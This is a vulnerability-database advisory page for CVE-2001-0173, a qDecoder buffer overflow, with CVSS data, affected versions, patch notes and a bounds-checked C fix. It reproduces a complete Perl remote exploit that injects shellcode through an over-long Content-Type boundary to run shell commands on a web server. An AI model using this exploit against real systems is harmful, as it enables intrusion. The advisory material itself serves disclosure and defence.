CVE-2001-0173
CVSS 10.0
Published: 2001-05-03 00:00:00
Revised: 2008-09-05 16:23:27
NMCOES

[Original] Buffer overflow in qDecoder library 5.08 and earlier, as used in CrazyWWWBoard, CrazySearch, and other CGI programs, allows remote attackers to execute arbitrary commands via a long MIME Content-Type header.


[CNNVD] qDecoder library buffer overflow vulnerability (CNNVD-200105-018)

qDecoder library 5.08 and earlier versions contain a buffer overflow vulnerability. When the library is used in CrazyWWWBoard, CrazySearch, and other CGI programs, a remote attacker can execute arbitrary commands by way of the MIME Content-Type header.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:nobreak_technologies:crazywwwboard:2000lepx
cpe:/a:qdecoder:qdecoder:4.3
cpe:/a:qdecoder:qdecoder:5.0.3
cpe:/a:nobreak_technologies:crazywwwboard:98
cpe:/a:nobreak_technologies:crazywwwboard:2000.0lepx
cpe:/a:qdecoder:qdecoder:4.3.1
cpe:/a:qdecoder:qdecoder:4.0
cpe:/a:nobreak_technologies:crazywwwboard:98pe
cpe:/a:qdecoder:qdecoder:5.0
cpe:/a:qdecoder:qdecoder:5.0.1
cpe:/a:nobreak_technologies:crazywwwboard:2000.0px
cpe:/a:nobreak_technologies:crazywwwboard:2000px
cpe:/a:nobreak_technologies:crazywwwboard:3.0.1
cpe:/a:qdecoder:qdecoder:5.0.2
cpe:/a:qdecoder:qdecoder:4.0.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0173
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0173
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-018
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2329
(VENDOR_ADVISORY)  BID  2329
http://xforce.iss.net/static/6033.php
(VENDOR_ADVISORY)  XF  crazywwwboard-qdecoder-bo
http://archives.neohapsis.com/archives/bugtraq/2001-01/0486.html
(VENDOR_ADVISORY)  BUGTRAQ  20010130 Nobreak Tecnologies CrazyWWWBoard Remote Buffer Overflow

- Vulnerability information

qDecoder library buffer overflow vulnerability
Critical  Buffer overflow
2001-05-03 00:00:00 2005-10-20 00:00:00
Remote ※ Local
qDecoder library 5.08 and earlier versions contain a buffer overflow vulnerability. When the library is used in CrazyWWWBoard, CrazySearch, and other CGI programs, a remote attacker can execute arbitrary commands by way of the MIME Content-Type header.

- Advisories and patches

qdecoder.diff patch was provided by "You, Jin-Ho".
        qDecoder qDecoder 4.0
        
        qDecoder qDecoder 4.0.1
        
        qDecoder qDecoder 4.3
        
        qDecoder qDecoder 4.3.1
        
        qDecoder qDecoder 5.0
        
        qDecoder qDecoder 5.0.1
        
        qDecoder qDecoder 5.0.2
        
        qDecoder qDecoder 5.0.3
        

- Vulnerability information (20606)

qDecoder 4.x/5.x Remote Buffer Overflow Vulnerability (EDBID:20606)
cgi remote
2000-03-26 Verified
0 Jin Ho You
N/A
source: http://www.securityfocus.com/bid/2329/info

Improperly validated user-supplied input to the Content-Type header can create an overflow condition.

As a result, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address, potentially allowing remote code execution with the privileges of the webserver.

#!/usr/bin/perl
# crazy.pl
#
# CrazyWWWBoard.cgi Remote Buffer Overflow Exploit for i386 Linux
#
# CGIs using qDecoder 4.0~5.0.8 are vulnerable to a boundary delimiter
# over 254 characters in the header "Content-Type: multipart/form-data".
#
# nc, the netcat program is required.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 03/26/2000

$nc_path = "nc";        # path of netcat program

$usage =
"usage: crazy.pl [options] CGI-URL\n
  CGI-URL        URL of the target CGI
  -c command     Bourne shell command
                 Default: '/bin/echo 00ps, Crazy!'
  -o offset      Offset of the egg shell code,
                 Recommended [-300,+300]

example)
  crazy.pl http://target.com:8080/cgi-bin/vulnerable.cgi
  crazy.pl -o -47 target.com/cgi-bin/vulnerable.cgi
  crazy.pl -c 'echo vulnerable.cgi has a security hole! | mail root' \\
           target.com/cgi-bin/vulnerable.cgi

";

require 'getopt.pl';
Getopt('oc');

if ($#ARGV < 0) {
    print $usage;
    exit(0);
};

$cgiurl = $ARGV[0];
$command = $opt_c ? $opt_c : "/bin/echo 00ps, Crazy!";
$offset = $opt_o ? $opt_o : 0;

$cgiurl =~ s/http:\/\///;
($host, $cgiuri) = split(/\//, $cgiurl, 2);
($host, $port) = split(/:/, $host);
$port = 80 unless $port;
$command = "/bin/echo Content-Type: text/html;/bin/echo;($command)";
$cmdlen = length($command);
$argvp = int((0x0b + $cmdlen) / 4) * 4 + 4;
$shellcode =
  "\xeb\x37"                            # jmp 0x37
. "\x5e"                                # popl %esi
. "\x89\x76" . pack(C, $argvp)          # movl %esi,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x08"                        # addl $0x8,%eax
. "\x89\x46" . pack(C, $argvp + 4)      # movl %eax,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x0b"                        # addl $0xb,%eax
. "\x89\x46" . pack(C, $argvp + 8)      # movl %eax,0xb(%esi)
. "\x31\xc0"                            # xorl %eax,%eax
. "\x88\x46\x07"                        # movb %eax,0x7(%esi)
. "\x4e"                                # dec %esi
. "\x88\x46\x0b"                        # movb %eax,0xb(%esi)
. "\x46"                                # inc %esi
. "\x88\x46" . pack(C, 0x0b + $cmdlen)  # movb %eax,0xb(%esi)
. "\x89\x46" . pack(C, $argvp + 12)     # movl %eax,0xb(%esi)
. "\xb0\x0b"                            # movb $0xb,%al
. "\x89\xf3"                            # movl %esi,%ebx
. "\x8d\x4e" . pack(C, $argvp)          # leal 0xb(%esi),%ecx
. "\x8d\x56" . pack(C, $argvp + 12)     # leal 0xb(%esi),%edx
. "\xcd\x80"                            # int 0x80
. "\x31\xdb"                            # xorl %ebx,%ebx
. "\x89\xd8"                            # movl %ebx,%eax
. "\x40"                                # inc %eax
. "\xcd\x80"                            # int 0x80
. "\xe8\xc4\xff\xff\xff"                # call -0x3c
. "/bin/sh0-c0"                         # .string "/bin/sh0-c0"
. $command;
$offset -= length($command) / 2 + length($host . $port , $cgiurl);
$shelladdr = 0xbffffbd0 + $offset;
$noplen = 242 - length($shellcode);
$jump = $shelladdr + $noplen / 2;
$entries = $shelladdr + 250;
$egg = "\x90" x $noplen . $shellcode . pack(V, $jump) x 9
        . pack(V, $entries) x 2 . pack(V, $jump) x 2;

$content = substr($egg, 254) .
  "--\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n0\r\n--$egg--\r\n";
$contentlength = length($content);

printf STDERR "Jump to 0x%x\n", $jump;

open(HTTP, "|$nc_path $host $port");
select(HTTP); $|= 1;
print HTTP <<__HEADER__;
POST /$cgiuri HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.72 [ko] (X11; I; Linux 2.2.14 i686)
Host: $host:$port
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: ko
Accept-Charset: euc-kr,*,utf-8
Content-type: multipart/form-data; boundary=$egg
Content-length: $contentlength

$content
__HEADER__
close(HTTP);


- Vulnerability information

11866
qDecoder Library MIME Content-Type Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-01-30 Unknown
2001-01-30 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

qDecoder Remote Buffer Overflow Vulnerability
Input Validation Error 2329
Yes Yes
2001-01-30 12:00:00 2009-07-11 04:46:00
reported to bugtraq by "You, Jin-Ho" <jhyou@chonnam.chonnam.ac.kr> on Tue, 30 Jan 2001.

- Affected program versions

qDecoder qDecoder 5.0.3
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0.2
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.3.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.3
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.0.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.0
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 6.0.3

- Unaffected program versions

qDecoder qDecoder 6.0.3

- Vulnerability discussion

Improperly validated user-supplied input to the Content-Type header can create an overflow condition.

As a result, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address, potentially allowing remote code execution with the privileges of the webserver.
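A bounds-checked way of handling the header field that both descriptions above (this one and the one in the Exploit-DB entry) identify as the overflow source. This is an added illustration, not qDecoder's code or anything from the original reports; the function name parse_boundary is this example's choice, and the 70-character limit comes from RFC 2046.

```c
/* Added example (not qDecoder's code): bounded parsing of the
 * "boundary=" parameter of a multipart Content-Type header. The
 * report above describes a boundary longer than 254 characters
 * overrunning a fixed stack buffer; here the length is checked
 * before anything is copied. */
#include <stddef.h>
#include <string.h>

/* RFC 2046 section 5.1.1 limits a boundary to 70 characters. */
#define BOUNDARY_MAX 70

/* Extract the boundary from a header value such as
 * "multipart/form-data; boundary=----abc". Returns 1 and writes a
 * NUL-terminated copy into out (capacity outsz) on success; returns 0
 * if the type is not multipart, no boundary is present, or the value
 * is empty, over the protocol limit, or would not fit in out. */
int parse_boundary(const char *ctype, char *out, size_t outsz)
{
    const char *p;
    size_t n;

    if (ctype == NULL || out == NULL || outsz == 0)
        return 0;
    if (strncmp(ctype, "multipart/", 10) != 0)
        return 0;
    p = strstr(ctype, "boundary=");
    if (p == NULL)
        return 0;
    p += 9;                      /* skip "boundary=" */

    if (*p == '"') {             /* quoted form: boundary="..." */
        const char *q = strchr(++p, '"');
        if (q == NULL)
            return 0;
        n = (size_t)(q - p);
    } else {                     /* unquoted: ends at ';' or whitespace */
        n = strcspn(p, "; \t\r\n");
    }

    /* Length is validated before the destination buffer is touched. */
    if (n == 0 || n > BOUNDARY_MAX || n >= outsz)
        return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}
```

A caller that stores the boundary in a fixed stack array passes that array's size as outsz, so an over-long value is rejected rather than written past the end.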

- Exploit

crazywww.pl exploit was provided by "You, Jin-Ho" <jhyou@chonnam.chonnam.ac.kr>.

- Solution

qdecoder.diff patch was provided by "You, Jin-Ho" <jhyou@chonnam.chonnam.ac.kr>.


qDecoder qDecoder 4.0

qDecoder qDecoder 4.0.1

qDecoder qDecoder 4.3

qDecoder qDecoder 4.3.1

qDecoder qDecoder 5.0

qDecoder qDecoder 5.0.1

qDecoder qDecoder 5.0.2

qDecoder qDecoder 5.0.3

- References
